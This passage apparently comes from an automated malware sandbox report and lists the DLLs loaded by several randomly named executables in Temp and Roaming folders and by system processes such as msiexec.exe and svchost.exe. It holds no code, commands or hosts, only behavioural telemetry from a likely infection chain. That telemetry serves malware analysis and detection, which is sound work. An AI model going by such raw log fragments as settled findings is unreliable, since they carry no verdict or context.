Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: samlib.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll
Source: C:\Windows\explorer.exe	Section loaded: version.dll
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll
Source: C:\Windows\explorer.exe	Section loaded: provsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: nlaapi.dll
